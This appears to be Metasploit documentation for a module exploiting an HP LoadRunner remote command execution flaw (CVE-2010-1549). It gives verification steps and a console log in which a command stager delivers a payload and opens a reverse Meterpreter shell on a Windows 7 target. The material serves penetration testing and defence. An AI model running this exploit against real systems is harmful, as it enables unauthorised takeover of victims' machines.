## Vulnerable Application HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549) This module exploits a remote command execution vulnerability in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default). During testing, additional versions were verified to be vulnerable. The following list documents them: - HP LoadRunner 12.53 Community Edition (non-default SSL turned off) HP LoadRunner 9.50 or below, or a version documented above. ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec``` 4. Do: ```set RHOST [ip]``` 5. Do: ```run``` 6. You should get a shell. ## Scenarios ### Win7 OS with HP LoadRunner 12.53 Community Edition ``` msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim RHOST => victim msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit [*] Started reverse TCP handler on 1.1.1.1:4444 [*] victim:54345 - Sending payload... [*] victim:54345 - Command Stager progress - 1.47% done (1499/102292 bytes) [*] victim:54345 - Command Stager progress - 2.93% done (2998/102292 bytes) [*] victim:54345 - Command Stager progress - 4.40% done (4497/102292 bytes) [*] victim:54345 - Command Stager progress - 5.86% done (5996/102292 bytes) [*] victim:54345 - Command Stager progress - 7.33% done (7495/102292 bytes) ...snip... [*] victim:54345 - Command Stager progress - 92.32% done (94437/102292 bytes) [*] victim:54345 - Command Stager progress - 93.79% done (95936/102292 bytes) [*] victim:54345 - Command Stager progress - 95.25% done (97435/102292 bytes) [*] victim:54345 - Command Stager progress - 96.72% done (98934/102292 bytes) [*] victim:54345 - Command Stager progress - 98.15% done (100400/102292 bytes) [*] victim:54345 - Command Stager progress - 99.55% done (101827/102292 bytes) [*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes) [*] Sending stage (179267 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100 meterpreter > sysinfo Computer : TARGET OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : en_AU Domain : DOMAIN Logged On Users : 3 Meterpreter : x86/windows meterpreter > Background session 1? [y/N] ```